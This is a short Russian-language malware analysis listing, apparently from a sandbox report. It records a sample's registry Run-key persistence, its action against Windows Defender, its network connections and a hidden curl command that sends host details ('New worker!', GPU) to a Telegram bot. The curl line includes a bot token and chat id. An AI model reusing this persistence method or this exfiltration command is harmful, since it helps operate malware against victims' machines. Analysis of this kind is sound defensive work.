Техническая информация
- [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'RegHost' = '%APPDATA%\Microsoft\RegHost.exe'
- Системный антивирус (Защитник Windows)
- %APPDATA%\microsoft\reghost.exe
- '65.##.234.58':8080
- 'ap#.##legram.org':443
- '80.##0.113.62':80
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?ca##############
- 'ap#.##legram.org':443
- DNS ASK ap#.##legram.org
- '<SYSTEM32>\curl.exe' "https://api.telegram.org/bot5085421438:AAHmPt5uQhWzP79_WEIMYB3Sq6kZ9Hu2cNo/sendMessage?chat_id=-1001672031538&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0A(Windows De... (со скрытым окном)